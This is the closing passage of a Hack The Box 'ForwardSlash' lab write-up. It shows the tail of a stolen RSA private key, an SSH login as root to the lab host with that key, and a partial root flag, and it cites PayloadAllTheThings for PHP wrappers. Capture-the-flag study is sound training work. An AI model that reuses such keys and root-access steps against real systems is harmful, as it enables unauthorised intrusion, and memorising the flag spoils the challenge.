6Orz/0C+TxmlTGVOvkQWij4GC9rcOMaP03zXamQTSGNROM+S1I9UUoQBrwe2nQeh
i2B/AlO4PrOHJtfSXIzsedmDNLoMqO5/n/xAqLAHAoGATnv8CBntt11JFYWvpSdq
tT38SlWgjK77dEIC2/hb/J8RSItSkfbXrvu3dA5wAOGnqI2HDF5tr35JnR+s/JfW
woUx/e7cnPO9FMyr6pbr5vlVf/nUBEde37nq3rZ9mlj3XiiW7G8i9thEAm471eEi
/vpe2QfSkmk1XGdV/svbq/sCgYAZ6FZ1DLUylThYIDEW3bZDJxfjs2JEEkdko7mA
1DXWb0fBno+KWmFZ+CmeIU+NaTmAx520BEd3xWIS1r8lQhVunLtGxPKvnZD+hToW
J5IdZjWCxpIadMJfQPhqdJKBR3cRuLQFGLpxaSKBL3PJx1OID5KWMa1qSq/EUOOr
OENgOQKBgD/mYgPSmbqpNZI0/B+6ua9kQJAH6JS44v+yFkHfNTW0M7UIjU7wkGQw
ddMNjhpwVZ3//G6UhWSojUScQTERANt8R+J6dR0YfPzHnsDIoRc7IABQmxxygXDo
ZoYDzlPAlwJmoPQXauRl1CgjlyHrVUTfS0AkQH2ZbqvK5/Metq8o
-----END RSA PRIVATE KEY-----


Get the root flag

Finally got now the root.txt

# bash


root in htb/boxes/ForwardSlash via 🐍 v3.8.2 
❯ ssh -i id_rsa root@10.10.10.183
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed Apr 29 00:32:02 UTC 2020

  System load:  0.0                Processes:            203
  Usage of /:   30.8% of 19.56GB   Users logged in:      2
  Memory usage: 12%                IP address for ens33: 10.10.10.183
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

16 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Wed Apr 29 00:31:34 2020 from 10.10.14.114
root@forwardslash:~# whoami
root
root@forwardslash:~# hostname
forwardslash
root@forwardslash:~# ls
root.txt
root@forwardslash:~# cut -c 1-12 root.txt 
76aec6f7af6b
root@forwardslash:~# exit
logout
Connection to 10.10.10.183 closed.


If you liked my writeup please leave a respect on my Profile

Payas0

Referrences:

PayloadAllTheThings - PHP Wrapper